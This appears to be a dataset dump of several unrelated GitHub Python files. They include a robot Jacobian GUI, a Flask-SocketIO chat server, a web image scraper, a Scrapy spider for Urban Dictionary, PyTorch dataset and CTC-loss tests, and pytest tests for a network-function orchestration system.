')\n #print(np.matrix(J1a)) \n \n J1b = J1a_1 - J1a\n #print(\"j1b = \")\n #print(J1b)\n \n J01 = [[(J1[1,0]*J1b[2,0])-(J1[2,0]*J1b[1,0])],\n [(J1[2,0]*J1b[0,0])-(J1[0,0]*J1b[2,0])],\n [(J1[0,0]*J1b[1,0])-(J1a[1,0]*J1b[0,0])]]\n \n print(\"J01 = \")\n print(np.matrix(J01))\n \n Z_1 = [[1],[0],[0]] # The [1,0,0 ] vector\n\n # Row 1 - 3, Column 2\n\n J2 = [[1 ,0,0],[0,1,0],[0,0,1]]\n \n J2 = np.dot(J2,Z_1)\n #print('J2 = ')\n #print(np.matrix(J2)) \n \n J2a_1 = H0_3[0:3,3:]\n J2a_1 = np.matrix(J2a_1)\n #print(J2a_1)\n \n J2b_1 = H0_2[0:3,3:]\n J2b_1 = np.matrix(J2b_1)\n #print(J2b_1)\n \n J2a = J2a_1 - J2b_1\n #print(\"j2a = \")\n #print(J2a)\n\n J02 = [[(J2[1,0]*J2a[2,0])-(J2[2,0]*J2a[1,0])],\n [(J2[2,0]*J2a[0,0])-(J2[0,0]*J2a[2,0])],\n [(J2[0,0]*J2a[1,0])-(J2[1,0]*J2a[0,0])]]\n print(\"J02 = \")\n print(np.matrix(J02)) \n\n \n Z_3 = [[0],[0],[1]] # The [0,0,1] vector\n\n # Row 1 - 3, Column 3\n \n J03 = H0_3[0:3,0:3]\n \n J03 = np.dot(J03,Z_3)\n print('J03 = ')\n print(np.matrix(J03))\n \n J4 = [[0],[0],[1]]\n J4 = np.matrix(J4)\n #print(\"J4 = \")\n #print(J4)\n \n J5 = [[1 ,0,0],[0,1,0],[0,0,1]]\n J6 = [[1 ,0,0],[0,1,0],[0,0,1]]\n \n \n J5 = np.dot(J5,Z_1)\n J5 = np.matrix(J5)\n #print(\"J5 = \")\n #print(np.matrix(J5)) \n \n J6 = np.dot(J6,Z_0)\n #print('J6 = ')\n #print(np.matrix(J6)) \n \n JM1 = np.concatenate((J01,J02,J03),1)\n #print(JM1)\n JM2 = np.concatenate((J4,J5,J6),1)\n #print(JM2)\n \n J = np.concatenate((JM1,JM2),0)\n print(\"J = \")\n print(J)\n \n sg.popup('J = ', J)\n\n \n disable_J.update(disabled=True)\n disable_DetJ.update(disabled=False)\n disable_IV.update(disabled=False)\n disable_TJ.update(disabled=False) \n\n elif event == 'Det(J)':\n # singularity = Det(J)\n # np.linalg.det(M)\n # Let JM1 become the 3x3 position matrix for obtaining the Determinant\n\n DJ = np.linalg.det(JM1)\n #print(\"DJ = \",DJ)\n sg.popup('DJ = ',DJ)\n\n if DJ == 0.0 or DJ == -0:\n disable_IV.update(disabled=True)\n sg.popup('Warning: Jacobian Matrix is Non-Invertible!')\n\n elif event == 'Inverse of J':\n # Inv(J)\n try:\n JM1 = np.concatenate((J01,J02,J03),1)\n except:\n JM1 = -1 #NAN\n sg.popup('Warning!')\n sg.popup('Restart the GUI then go first to \"Click this before Solving Forward Kinematics\"!')\n break\n IJ = np.linalg.inv(JM1)\n #print(\"IV = \")\n #print(IV)\n sg.popup('IJ = ',IJ)\n\n elif event == 'Transpose of J':\n # Transpose of Jacobian Matrix\n try:\n JM1 = np.concatenate((J01,J02,J03),1)\n except:\n JM1 = -1 #NAN\n sg.popup('Warning!')\n sg.popup('Restart the GUI then go first to \"Click this before Solving Forward Kinematics\"!')\n break\n \n TJ = np.transpose(JM1)\n #print(\"TJ = \")\n #print(TJ)\n sg.popup('TJ = ',TJ)\n\n elif event == 'Solve Inverse Kinematics':\n Inverse_Kinematics_window()\n \n\n\n \nwindow.close()","repo_name":"MBMS-05/Jacobian-Matrix","sub_path":"Jacobian-Matrix.py","file_name":"Jacobian-Matrix.py","file_ext":"py","file_size_in_byte":14209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31582927538","text":"from flask import Flask, Response, session, send_from_directory\r\nfrom flask_socketio import SocketIO, join_room, leave_room, send, emit\r\nfrom api.models import db, User, Room, Message\r\nfrom api.views import api_blueprints\r\n# from flask_cors import CORS\r\nfrom datetime import datetime\r\nfrom dotenv import load_dotenv\r\nimport os\r\nload_dotenv()\r\n\r\napp = Flask(__name__, static_folder=\"./client/build\")\r\napp.register_blueprint(api_blueprints, url_prefix='/api')\r\n# CORS(app, origins=[\"http://localhost:3000\", \"ws://localhost:3000\"], supports_credentials=True)\r\napp.config['SECRET_KEY'] = os.getenv(\"SECRET_KEY\")\r\napp.config[\"SQLALCHEMY_DATABASE_URI\"] = os.getenv(\"SQLALCHEMY_DATABASE_URI\")\r\nsocketio = SocketIO(app, cors_allowed_origins=\"*\")\r\n\r\ndb.app = app\r\ndb.init_app(app)\r\n\r\n# Create tables\r\nwith app.app_context():\r\n db.create_all()\r\n\r\n# Serving frontend static files\r\n\r\n\r\n@app.route('/', defaults={'path': ''})\r\n@app.route('/<path:path>')\r\ndef serve(path):\r\n if path != \"\" and os.path.exists(app.static_folder + '/' + path):\r\n return send_from_directory(app.static_folder, path)\r\n else:\r\n return send_from_directory(app.static_folder, 'index.html')\r\n\r\n\r\n@app.get(\"/health\")\r\ndef health_check():\r\n return Response(\"ok\", 200)\r\n\r\n\r\n@app.get(\"/version\")\r\ndef get_version():\r\n return Response(\"0.1.0\", 200)\r\n\r\n\r\n@socketio.on(\"connect\")\r\ndef connect():\r\n\r\n username = session.get(\"username\")\r\n rid = session.get(\"room\")\r\n if not username or not rid:\r\n return\r\n room = Room.query.filter(Room.rid == rid).first()\r\n if not room:\r\n return\r\n user = User.query.filter(User.username == username).first()\r\n if not user:\r\n return\r\n # if user.rid != rid:\r\n # return\r\n\r\n join_room(rid)\r\n emit(\"join\", {\"username\": username,\r\n \"message\": \"has enter the room\"}, to=rid)\r\n # send({\"username\": username, \"message\": \"has enter the room\"}, to=room)\r\n print(f\"{username} join the room\")\r\n user.rid = rid\r\n room.num_users += 1\r\n db.session.commit()\r\n\r\n\r\n@socketio.on(\"disconnect\")\r\ndef disconnect():\r\n username = session.get(\"username\")\r\n # rid = session.get(\"room\")\r\n # print(f\"username: {username} rid: {rid}\")\r\n if not username:\r\n return\r\n user = User.query.filter(User.username == username).first()\r\n if not user or not user.rid:\r\n return\r\n rid = user.rid\r\n room = Room.query.filter(Room.rid == rid).first()\r\n if not room:\r\n user.rid = None\r\n db.session.commit()\r\n return\r\n # user = User.query.filter(User.username == username).first()\r\n # if not user:\r\n # return\r\n # if user.rid != rid:\r\n # return\r\n\r\n leave_room(rid)\r\n emit(\"leave\", {\"username\": username,\r\n \"message\": \"has left the room\"}, to=rid)\r\n # session.pop(\"room\", None)\r\n print(f\"{username} leave the room\")\r\n\r\n # TODO: Should write an automated script to delete all rooms with 0 users.\r\n if user.uid == room.host_uid:\r\n rid = session.get(\"room\")\r\n print(f\"host {username} left the room {rid}\")\r\n if room.num_users > 1:\r\n print(\"Assign a new host\")\r\n users = room.users\r\n for other_user in users:\r\n if other_user.uid != room.host_uid:\r\n room.host_uid = other_user.uid\r\n print(f\"new host uid {other_user.uid} assigned\")\r\n break\r\n print(f\"No user in the room. delete the room\")\r\n # normal procedure, no refresh or closing page\r\n elif rid:\r\n print(f\"room {rid} will be deleted\")\r\n db.session.delete(room)\r\n db.session.commit()\r\n return\r\n user.rid = None\r\n room.num_users -= 1\r\n # # user is not the host\r\n # if user.uid != room.host_uid:\r\n # user.rid = None\r\n # room.num_users -= 1\r\n # # user is host, assign another user as host\r\n # elif room.num_users > 1:\r\n # users = room.users\r\n # for other_user in users:\r\n # if other_user.uid != room.host_uid:\r\n # room.host_uid = other_user.uid\r\n # break\r\n # user.rid = None\r\n # room.num_users -= 1\r\n # # user is host, delete the whole room\r\n # else:\r\n # db.session.delete(room)\r\n db.session.commit()\r\n\r\n\r\n@socketio.on(\"chat\")\r\ndef handle_chat(data):\r\n username = data.get(\"username\")\r\n message = data.get(\"message\")\r\n rid = data.get(\"rid\")\r\n # print(\"received message:\", username, message)\r\n if not username or not message or not rid:\r\n return\r\n room = Room.query.filter(Room.rid == rid).first()\r\n if not room:\r\n return\r\n user = User.query.filter(User.username == username).first()\r\n if not user:\r\n return\r\n if user.rid != rid:\r\n return\r\n\r\n emit(\"message\", {\"username\": username, \"message\": message}, to=rid)\r\n newMessage = Message(\r\n msg=message,\r\n createdAt=datetime.now(),\r\n uid=user.uid,\r\n rid=room.rid\r\n )\r\n db.session.add(newMessage)\r\n db.session.commit()\r\n print(f\"{username}'s new message successfully added\")\r\n\r\n\r\n# Running app\r\nif __name__ == '__main__':\r\n socketio.run(app, debug=True)\r\n","repo_name":"yingtu35/Lets-Chat","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17146757399","text":"import tkinter\n\ndef afficher_lettre(name, index, mode):\n print(nom_var.get())\n \nfenetre_principale = tkinter.Tk()\n\nnom_var = tkinter.StringVar()\nnom_var.trace_add(\"write\", afficher_lettre)\n\nnom_entry = tkinter.Entry(fenetre_principale, textvariable=nom_var)\nnom_entry.pack()\n\nfenetre_principale.mainloop()","repo_name":"gdpe404/formation_avancee_python","sub_path":"04-gui/saisie_temps_reel.py","file_name":"saisie_temps_reel.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33569931010","text":"import sys\r\n\r\ninput = sys.stdin.readline\r\n\r\nword1 = input().strip()\r\nword2 = input().strip()\r\n\r\ndy = [0] * len(word2)\r\n\r\nfor i in range(len(word1)):\r\n cnt = 0\r\n for j in range(len(word2)):\r\n if cnt < dy[j]:\r\n cnt = dy[j]\r\n\r\n elif word1[i] == word2[j]:\r\n dy[j] = cnt + 1\r\n\r\nprint(max(dy))\r\n","repo_name":"dongjun-Yi/Algorithm","sub_path":"백준/Gold/9251. LCS/LCS.py","file_name":"LCS.py","file_ext":"py","file_size_in_byte":307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"2659455649","text":"import os\nimport random\nimport numpy as np\n\nimport torch\nfrom torch.utils.data import TensorDataset\nfrom .GeneralDataset import GeneralDataset\nimport pandas as pd\n\nclass GMM2DDataset(GeneralDataset):\n\n class_label_dict = {\n '0': 0,\n '1': 1\n }\n\n class_map = [\n '0',\n '1'\n ]\n\n def __init__(self, classes, num_per_class):\n label_transform_fn = lambda x: x\n data_transform_fn = lambda x: x\n super().__init__(data_transform_fn, label_transform_fn)\n self.num_per_class = num_per_class\n self.classes = classes\n\n def _get_data_raw(self, type):\n if type == 'train':\n df = pd.read_csv(\"data/GMM2D/2D_1000sample_2class_train.csv\")\n elif type == 'dev':\n df = pd.read_csv(\"data/GMM2D/2D_1000sample_2class_test.csv\")\n else:\n raise NotImplementedError()\n\n x = [eval(x) for x in df['x']]\n y = df['y']\n data_sampled = self._subsample_by_classes(zip(x, y), self.classes, self.num_per_class)\n x = [x[0] for x in data_sampled]\n y = [x[1] for x in data_sampled]\n\n return torch.stack([torch.FloatTensor(x[0]) for x in data_sampled]),\\\n torch.stack([torch.tensor(x[1]) for x in data_sampled])\n\n @classmethod\n def get_class_label_dict(self):\n return self.class_label_dict\n @classmethod\n def get_class_map(self):\n return self.class_map\n","repo_name":"hage1005/IF_project","sub_path":"src/data_utils/GMM2D.py","file_name":"GMM2D.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"74632550811","text":"import requests\r\nimport urllib.request\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\nurl = input(\"Enter the url bro: \")\r\n#url ='https://www.greaterkashmir.com/'\r\n\r\nheaders = {\r\n 'Accept-Encoding': 'gzip, deflate, sdch',\r\n 'Accept-Language': 'en-US,en;q=0.8',\r\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 'Referer': 'http://www.wikipedia.org/',\r\n 'Connection': 'keep-alive',\r\n}\r\n\r\nr = requests.get(url=url, headers=headers)\r\nprint(r)\r\n\r\nsoup = BeautifulSoup(r.text, 'html.parser')\r\ni = 0\r\nfor img in soup.findAll('img'):\r\n i += 1\r\n image_temp = img.get('src')\r\n if image_temp[:1] == '/':\r\n image_path = url + image_temp\r\n else:\r\n image_path = image_temp\r\n\r\n if '.jpg' in image_path:\r\n with open(\"images/{}.jpg\".format(i), 'wb') as f:\r\n f.write(requests.get(url=image_path).content)\r\n else:\r\n pass\r\n","repo_name":"ikhlaqmalik13/webscraping_images","sub_path":"image_d.py","file_name":"image_d.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4066253111","text":"# -*- coding: utf-8 -*-\n# Import libraries\nimport scrapy\n\nclass Link(scrapy.Item):\n # Set up expected output\n link = scrapy.Field()\n\nclass LinkListsSpider(scrapy.Spider):\n # For each page, extract the link to the word\n\n limiter = True # Limits the pages if true\n limit = 100 # Set limit of pages to scrap\n \n # Initialize Spider\n name = 'links'\n\n # Pages to scrap\n allowed_domains = ['https://www.urbandictionary.com/']\n \n if limiter == True:\n try:\n # Scrap from all the different pages either to max or to limit\n with open(\"link_list.csv\", \"rt\") as f:\n start_urls = [url.strip() for url in f.readlines()][1:limit]\n except:\n start_urls = []\n else:\n try:\n # Scrap from all the different pages either to max or to limit\n with open(\"link_list.csv\", \"rt\") as f:\n start_urls = [url.strip() for url in f.readlines()][1:]\n except:\n start_urls = []\n\n\n def parse(self, response):\n #Extract link to definitions\n xpath = '//h1/a[re:test(@href, \"/define.*\")]//@href' \n selection = response.xpath(xpath)\n for s in selection:\n l = Link()\n l['link'] = 'https://www.urbandictionary.com' + s.get()\n yield l","repo_name":"Pacholleck/webscaping_project","sub_path":"scrapy/urbandict/urbandict/spiders/02_links.py","file_name":"02_links.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13989305248","text":"from typing import Dict\n\nimport hypothesis.strategies as st\nimport numpy as np\nimport torch\nfrom hypothesis import given\nfrom myrtlespeech.loss.ctc_loss import CTCLoss\n\nfrom tests.utils.utils import arrays\nfrom tests.utils.utils import tensors\n\n\n# Fixtures and Strategies -----------------------------------------------------\n\n\n@st.composite\ndef ctc_loss_arguments(draw) -> st.SearchStrategy[Dict]:\n \"\"\"Generates args for class constructor and forward.\"\"\"\n ret_args = {}\n\n # generate input tensor\n ret_args[\"inputs\"] = draw(\n tensors(min_n_dims=3, max_n_dims=3, min_dim_size=2, max_dim_size=32)\n )\n # get shapes, convert to Python ints for Hypothesis\n max_seq_len, batch, features = ret_args[\"inputs\"].size()\n max_seq_len = int(max_seq_len)\n batch = int(batch)\n features = int(features)\n\n # generate CTCLoss arguments\n ret_args[\"blank\"] = draw(st.integers(min_value=0, max_value=features - 1))\n ret_args[\"reduction\"] = draw(st.sampled_from([\"none\", \"mean\", \"sum\"]))\n ret_args[\"zero_infinity\"] = draw(st.booleans())\n\n # generate remaining CTCLoss.forward arguments\n ret_args[\"targets\"] = torch.tensor(\n draw(\n arrays(\n shape=(batch, max_seq_len),\n dtype=np.int32,\n elements=st.integers(\n min_value=0, max_value=features - 1\n ).filter(lambda x: x != ret_args[\"blank\"]),\n )\n ),\n requires_grad=False,\n )\n\n ret_args[\"input_lengths\"] = torch.tensor(\n draw(\n arrays(\n shape=(batch,),\n dtype=np.int32,\n elements=st.integers(min_value=1, max_value=max_seq_len),\n )\n ),\n requires_grad=False,\n )\n\n target_lengths = []\n for length in ret_args[\"input_lengths\"]:\n # ensure CTC requirement that target length <= input length\n target_lengths.append(draw(st.integers(1, int(length))))\n ret_args[\"target_lengths\"] = torch.tensor(\n target_lengths, dtype=torch.int32, requires_grad=False\n )\n\n return ret_args\n\n\n# Tests -----------------------------------------------------------------------\n\n\n@given(args=ctc_loss_arguments())\ndef test_ctc_loss_matches_torch(args) -> None:\n \"\"\"Ensures CTCLoss matches torch CTCLoss(LogSoftmax(...), ...).\"\"\"\n myrtle_ctc_loss = CTCLoss(\n blank=args[\"blank\"],\n reduction=args[\"reduction\"],\n zero_infinity=args[\"zero_infinity\"],\n )\n\n torch_log_softmax = torch.nn.LogSoftmax(dim=-1)\n torch_ctc_loss = torch.nn.CTCLoss(\n blank=args[\"blank\"],\n reduction=args[\"reduction\"],\n zero_infinity=args[\"zero_infinity\"],\n )\n\n actual = myrtle_ctc_loss(\n inputs=(args[\"inputs\"], args[\"input_lengths\"]),\n targets=(args[\"targets\"], args[\"target_lengths\"]),\n )\n\n expected = torch_ctc_loss(\n log_probs=torch_log_softmax(args[\"inputs\"]),\n targets=args[\"targets\"],\n input_lengths=args[\"input_lengths\"],\n target_lengths=args[\"target_lengths\"],\n )\n\n assert isinstance(actual, torch.Tensor)\n assert isinstance(expected, torch.Tensor)\n\n assert actual.size() == expected.size()\n\n assert torch.allclose(actual, expected)\n","repo_name":"MyrtleSoftware/myrtlespeech","sub_path":"tests/loss/test_ctc_loss.py","file_name":"test_ctc_loss.py","file_ext":"py","file_size_in_byte":3241,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"32"} +{"seq_id":"32514549858","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\nimport sys\n\nfrom sam.base.messageAgent import DEFAULT_ZONE\nfrom sam.base.request import REQUEST_STATE_IN_PROCESSING\nfrom sam.base.sfcConstant import STATE_IN_PROCESSING\nif sys.version > '3':\n import queue as Queue\nelse:\n import Queue\nfrom datetime import datetime\n\nimport pytest\n\nfrom sam.base.slo import SLO\nfrom sam.base.sfc import SFCI\nfrom sam.base.vnf import VNF_TYPE_MAX\nfrom sam.base.compatibility import screenInput\nfrom sam.base.path import ForwardingPathSet, MAPPING_TYPE_UFRR, MAPPING_TYPE_E2EP\nfrom sam.base.shellProcessor import ShellProcessor\nfrom sam.base.server import Server, SERVER_TYPE_CLASSIFIER, SERVER_TYPE_NFVI, \\\n SERVER_TYPE_NORMAL\nfrom sam.serverController.serverManager.serverManager import SERVERID_OFFSET\nfrom sam.base.path import MAPPING_TYPE_NOTVIA_PSFC\nfrom sam.base.switch import SWITCH_TYPE_DCNGATEWAY, SWITCH_TYPE_NPOP\nfrom sam.base.link import Link\nfrom sam.test.testBase import TestBase\nfrom sam.orchestration.oSFCAdder import OSFCAdder\nfrom sam.orchestration.oSFCDeleter import OSFCDeleter\nfrom sam.measurement.dcnInfoBaseMaintainer import DCNInfoBaseMaintainer\nfrom sam.base.loggerConfigurator import LoggerConfigurator\nfrom sam.orchestration.orchInfoBaseMaintainer import OrchInfoBaseMaintainer\n\nMODE_UFRR = 0\nMODE_NOTVIA_REMAPPING = 1\nMODE_NOTVIA_PSFC = 2\nMODE_END2END_PROTECTION = 3\nMODE_DIRECT_REMAPPING = 4\n\n\nclass TestOSFCAdderDeleterClass(TestBase):\n @classmethod\n def setup_class(cls):\n cls.tc = TestOSFCAdderDeleterClass()\n\n # setup\n logConfigur = LoggerConfigurator(__name__, level='info')\n cls.logger = logConfigur.getLogger()\n\n cls.sP = ShellProcessor()\n cls.tc.clearQueue()\n\n cls._genSwitchDict()\n cls._genLinkDict()\n cls._genServerDict()\n\n classifier = cls.tc.genClassifier(\"2.2.0.36\")\n cls.sfc = cls.tc.genUniDirectionSFC(classifier)\n cls.sfc.slo = SLO(latency=10, throughput=0.005)\n cls.sfci = SFCI(cls.tc._genSFCIID(), [],\n forwardingPathSet=ForwardingPathSet({}, MAPPING_TYPE_NOTVIA_PSFC, {}))\n zoneName = cls.sfc.attributes['zone']\n cls.logger.info(\"zoneName:{0}\".format(zoneName))\n cls.addSFCRequest = cls.tc.genAddSFCRequest(cls.sfc)\n cls.addSFCIRequest = cls.tc.genAddSFCIRequest(cls.sfc, cls.sfci)\n cls.delSFCIRequest = cls.tc.genDelSFCIRequest(cls.sfc, cls.sfci)\n cls.delSFCRequest = cls.tc.genDelSFCRequest(cls.sfc)\n\n cls._dib = DCNInfoBaseMaintainer()\n cls._oib = OrchInfoBaseMaintainer(\"localhost\", \"dbAgent\", \"123\")\n\n cls.oA = OSFCAdder(cls._dib, cls.logger, zoneName=DEFAULT_ZONE)\n cls.oA._dib.updateServersInAllZone(cls.servers)\n cls.oA._dib.updateSwitchesInAllZone(cls.switches)\n cls.oA._dib.updateLinksInAllZone(cls.links)\n\n cls.oD = OSFCDeleter(cls._dib, cls._oib, cls.logger)\n\n @classmethod\n def teardown_class(cls):\n cls._oib.dbA.dropTable(\"Request\")\n cls._oib.dbA.dropTable(\"SFC\")\n cls._oib.dbA.dropTable(\"SFCI\")\n\n @classmethod\n def _genSwitchDict(cls):\n cls.switches = {DEFAULT_ZONE:{}}\n\n switchList = cls.tc.genSwitchList(1, SWITCH_TYPE_DCNGATEWAY,\n [\"2.2.0.32/27\"], range(1,2))\n for switch in switchList:\n switchID = switch.switchID\n cls.switches[DEFAULT_ZONE][switchID] = {'switch':switch,\n 'Active':True}\n\n switchList = cls.tc.genSwitchList(2, SWITCH_TYPE_NPOP,\n [\"2.2.0.64/27\", \"2.2.0.96/27\"], range(2,4), \n supportVNFList=[range(VNF_TYPE_MAX+1), range(VNF_TYPE_MAX+1)])\n for switch in switchList:\n switchID = switch.switchID\n cls.switches[DEFAULT_ZONE][switchID] = {'switch': switch,\n 'Active': True}\n\n @classmethod\n def _genLinkDict(cls):\n cls.links = {DEFAULT_ZONE:{}}\n cls.links[DEFAULT_ZONE] = {\n (1,2):{'link':Link(1,2),'Active':True},\n (2,1):{'link':Link(2,1),'Active':True},\n (1,3):{'link':Link(1,3),'Active':True},\n (3,1):{'link':Link(3,1),'Active':True},\n (2,3):{'link':Link(2,3),'Active':True},\n (3,2):{'link':Link(3,2),'Active':True},\n }\n\n @classmethod\n def _genServerDict(cls):\n serversDictList = {DEFAULT_ZONE:[]}\n serversDictList[DEFAULT_ZONE].extend(\n cls.tc.genServerList(1, SERVER_TYPE_CLASSIFIER,\n [\"2.2.0.36\"], [\"2.2.0.35\"], [SERVERID_OFFSET])\n )\n serversDictList[DEFAULT_ZONE].extend(\n cls.tc.genServerList(1, SERVER_TYPE_NORMAL,\n [\"2.2.0.34\"], [\"2.2.0.34\"], [SERVERID_OFFSET+1])\n )\n serversDictList[DEFAULT_ZONE].extend(\n cls.tc.genServerList(3, SERVER_TYPE_NFVI,\n [\"2.2.0.69\", \"2.2.0.71\", \"2.2.0.99\"],\n [\"2.2.0.68\", \"2.2.0.70\", \"2.2.0.98\"],\n range(SERVERID_OFFSET+2,SERVERID_OFFSET+2+3))\n )\n cls.servers = {DEFAULT_ZONE:{}}\n for server in serversDictList[DEFAULT_ZONE]:\n cls.servers[DEFAULT_ZONE][server.getServerID()] = {\n 'Active': True,\n 'timestamp': datetime(2020, 10, 27, 0, 2, 39, 408596),\n 'server': server}\n cls.logger.debug(\"serverDict:{0}\".format(cls.servers))\n\n @pytest.mark.skip(reason='Temporarly')\n def test_genAddSFCCmd(self):\n # exercise\n cmd = self.oA.genAddSFCCmd(self.addSFCRequest)\n self._oib.addSFCRequestHandler(self.addSFCRequest,\n cmd,\n REQUEST_STATE_IN_PROCESSING\n )\n sfc = cmd.attributes['sfc']\n self.logger.info(sfc)\n\n # verify\n assert sfc.sfcUUID == self.sfc.sfcUUID\n\n @pytest.mark.skip(reason='Deprecated function')\n def test_genAddSFCICmd(self):\n # exercise\n cmd = self.oA.genAddSFCICmd(self.addSFCIRequest)\n self._oib.addSFCIRequestHandler(self.addSFCIRequest,\n cmd,\n REQUEST_STATE_IN_PROCESSING\n )\n\n sfci = cmd.attributes['sfci']\n forwardingPathSet = sfci.forwardingPathSet\n primaryForwardingPath = forwardingPathSet.primaryForwardingPath\n backupForwardingPath = forwardingPathSet.backupForwardingPath\n\n # verify\n assert primaryForwardingPath == {1: [[10001, 1, 2, 10003], [10003, 2, 1, 10001]]}\n assert backupForwardingPath == {1: {(1, 2, 2): [[1, 3, 10005], [10005, 3, 1, 10001]], (2, 10003, 3): [[2, 10004], [10004, 2, 1, 10001]]}}\n\n @pytest.mark.skip(reason='TODO: add SFCI to DB first')\n def test_genDelSFCICmd(self):\n # exercise\n cmd = self.oD.genDelSFCICmd(self.delSFCIRequest)\n self._oib.delSFCIRequestHandler(self.delSFCIRequest,\n cmd,\n REQUEST_STATE_IN_PROCESSING,\n STATE_IN_PROCESSING\n )\n sfc = cmd.attributes['sfc']\n sfci = cmd.attributes['sfci']\n\n # verify\n assert sfc.sfcUUID == self.sfc.sfcUUID\n assert sfci.sfciID == self.sfci.sfciID\n\n @pytest.mark.skip(reason='TODO: add SFC to DB first')\n def test_genDelSFCCmd(self):\n # exercise\n cmd = self.oD.genDelSFCCmd(self.delSFCRequest)\n self._oib.delSFCRequestHandler(self.delSFCRequest,\n cmd,\n REQUEST_STATE_IN_PROCESSING,\n STATE_IN_PROCESSING)\n sfc = cmd.attributes['sfc']\n\n # verify\n assert sfc.sfcUUID == self.sfc.sfcUUID\n\n # @pytest.mark.skip(reason='Temporarly')\n def test_genABatchOfRequestAndAddSFCICmdsReuseVNFI(self):\n # exercise\n self._requestBatchQueue = Queue.Queue()\n self.addSFCIRequest.attributes['mappingType'] = MAPPING_TYPE_UFRR\n self._requestBatchQueue.put(self.addSFCIRequest)\n self._requestBatchQueue.put(self.addSFCIRequest)\n\n requestCmdBatch = self.oA.genABatchOfRequestAndAddSFCICmds(\n self._requestBatchQueue)\n\n # verify\n for (request, cmd) in requestCmdBatch:\n sfci = cmd.attributes['sfci']\n self.logVNFISeq(sfci.vnfiSequence)\n forwardingPathSet = sfci.forwardingPathSet\n primaryForwardingPath = forwardingPathSet.primaryForwardingPath\n backupForwardingPath = forwardingPathSet.backupForwardingPath\n self.logger.info(\"forwardingPathSet:{0}\".format(\n forwardingPathSet))\n screenInput()\n # each time will print (vnfiID, serverID) information\n # if program reuse vnfi, you will find that the same (vnfiID, serverID) twice\n\n assert True == True\n\n @pytest.mark.skip(reason='Temporarly')\n def test_genABatchOfRequestAndAddSFCICmdsUFRR(self):\n # exercise\n self._requestBatchQueue = Queue.Queue()\n self.addSFCIRequest.attributes['mappingType'] = MAPPING_TYPE_UFRR\n self._requestBatchQueue.put(self.addSFCIRequest)\n\n requestCmdBatch = self.oA.genABatchOfRequestAndAddSFCICmds(\n self._requestBatchQueue)\n\n # verify\n for (request, cmd) in requestCmdBatch:\n sfci = cmd.attributes['sfci']\n # self.logVNFISeq(sfci.vnfiSequence)\n forwardingPathSet = sfci.forwardingPathSet\n primaryForwardingPath = forwardingPathSet.primaryForwardingPath\n backupForwardingPath = forwardingPathSet.backupForwardingPath\n # self.logger.info(\"forwardingPathSet:{0}\".format(\n # forwardingPathSet))\n\n assert primaryForwardingPath == {1: [[(0, 10001), (0, 1), (0, 3), (0, 10005)], [(1, 10005), (1, 3), (1, 1), (1, 10001)]]}\n assert backupForwardingPath == {1: \n {(('failureNodeID', 3), ('repairMethod', 'fast-reroute'), ('repairSwitchID', 1), ('newPathID', 2)):\n [[(0, 1), (0, 2), (0, 10003)], [(1, 10003), (1, 2), (1, 1), (1, 10001)]],\n (('failureNodeID', 10005), ('repairMethod', 'fast-reroute'), ('repairSwitchID', 3), ('newPathID', 3)):\n [[(0, 3), (0, 2), (0, 10003)], [(1, 10003), (1, 2), (1, 1), (1, 10001)]]}}\n\n @pytest.mark.skip(reason='Temporarly')\n def test_genABatchOfRequestAndAddSFCICmdsNotViaPSFC(self):\n # exercise\n self._requestBatchQueue = Queue.Queue()\n self.addSFCIRequest.attributes['mappingType'] = MAPPING_TYPE_NOTVIA_PSFC\n self._requestBatchQueue.put(self.addSFCIRequest)\n\n requestCmdBatch = self.oA.genABatchOfRequestAndAddSFCICmds(\n self._requestBatchQueue)\n\n # verify\n for (request, cmd) in requestCmdBatch:\n sfci = cmd.attributes['sfci']\n # self.logVNFISeq(sfci.vnfiSequence)\n forwardingPathSet = sfci.forwardingPathSet\n primaryForwardingPath = forwardingPathSet.primaryForwardingPath\n backupForwardingPath = forwardingPathSet.backupForwardingPath\n # self.logger.info(\"forwardingPathSet:{0}\".format(\n # forwardingPathSet))\n\n assert primaryForwardingPath != None\n assert backupForwardingPath != None\n\n @pytest.mark.skip(reason='Temporarly')\n def test_genABatchOfRequestAndAddSFCICmdsDPSFC(self):\n # exercise\n self._requestBatchQueue = Queue.Queue()\n self.addSFCIRequest.attributes['mappingType'] = MAPPING_TYPE_E2EP\n self._requestBatchQueue.put(self.addSFCIRequest)\n\n requestCmdBatch = self.oA.genABatchOfRequestAndAddSFCICmds(\n self._requestBatchQueue)\n\n # verify\n for (request, cmd) in requestCmdBatch:\n sfci = cmd.attributes['sfci']\n # self.logVNFISeq(sfci.vnfiSequence)\n forwardingPathSet = sfci.forwardingPathSet\n primaryForwardingPath = forwardingPathSet.primaryForwardingPath\n backupForwardingPath = forwardingPathSet.backupForwardingPath\n # self.logger.info(\"forwardingPathSet:{0}\".format(\n # forwardingPathSet))\n\n assert primaryForwardingPath != None\n assert backupForwardingPath != None\n\n def logVNFISeq(self, vnfiSequence):\n self.logger.info(\"vnfiSequence\")\n for stage in range(len(vnfiSequence)):\n vnfiList = vnfiSequence[stage]\n for vnfi in vnfiList:\n if type(vnfi.node) == Server:\n self.logger.info(\n \"stage:{0}, vnfiID:{1} @ serverID:{2}\".format(\n 